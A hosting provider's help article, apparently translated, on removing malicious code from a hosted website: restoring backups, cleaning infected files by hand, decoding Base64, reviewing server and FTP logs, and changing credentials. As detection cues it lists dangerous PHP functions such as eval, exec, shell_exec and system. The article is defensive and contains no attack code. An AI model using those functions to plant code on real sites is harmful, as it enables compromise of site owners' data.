2.15.2.2. Virus cleaning

When antivirus on the hosting, when scanning, it finds malicious code, a notification is sent to the owner of the hosting account with information about the problem. It is imperative to remove the malicious code, as its presence may cause problems with the data security of both the infected site and neighboring sites in the same hosting account.

Removing the malicious code should be done after reading antivirus report and analysis of the malicious code itself. Quite often, the removal of malicious code can lead to problems in the operation of the site due to its insertion into important scripts of the site system.

In most cases, performing a complete cleaning of viruses is not enough to ensure the security of the site, since it is necessary to detect the source of infection and eliminate it. Without such action, re-infection may only be a matter of time.

It is recommended to use additional services for checking the site for viruses, for example, the service WPScan.

There are several ways to remove viruses:

• By backup restore site files until the virus code appears.
• By manual virus cleaning.

To clean your hosting account from malicious code, you need to familiarize yourself with antivirus report and eliminate all found comments. It is necessary to open each of the infected files, carefully examine its contents and delete from it fragments of malicious code (the antivirus highlights only found signatures in the file, the virus code may be in other parts of the file and not be selected, it is important to check the entire file and delete suspicious data). Completely delete infected files. only if they consist entirely of malicious code.

You can make a complete replacement of site files with identical ones from your own backup copy or from official sources. For example, most WordPress files can be found in the repository at GitHub.

To search and edit files, you can use filemanager control panel or any FTPclient.

Pay attention to the code, which is encrypted in Base64. It is in this form that malicious code is often placed. You can decrypt such an encoded section, for example, using ofthis service.

Dangerous PHP functions include: eval, exec, shell_exec, system, passthru... When finding such functions, you should pay special attention to them, as they are often used in malicious code.

To find the source of infection, you should analyze site logs for suspicious requests to him. In the logs, it is worth checking the data for the date of the last changes of the virus files.

Suspicious requests include:

• POST and PUT requests.
• Requests to the site admin panel from third-party IP addresses.
• Queries to protected directories of the form system or storage²⁾.
• Queries that contain encoded text in the form of Base64, etc., or SQL queries.
• Queries for recently installed plugins.

Besides checking server logs worth checking also FTP logs, outgoing connection logs and authorization logs in the control panel. If suspicious entries were found, it is worth changing passwords FTPusers, database users³⁾ and account, additionally setting two-step authentication... You can generate new complex passwords at this page. If outgoing connections were found that should not be made, you can set limits for all or certain outgoing connections for the entire hosting account for the duration of the problem.

After checking the logs, you need to check the site files for the presence of third—party code. First of all, it is worth checking the files of recently installed plugins and modules. It is important to beware of unofficial plugins and modules, especially if they are paid but were obtained for free from third party sites. If there are any, then they should be removed or restore backup site until they are installed.

Discard any file managers on the site itself. For the most part, they are unsafe and can pose a great threat.

To ensure the safety of the site, you should familiarize yourself with protection recommendations.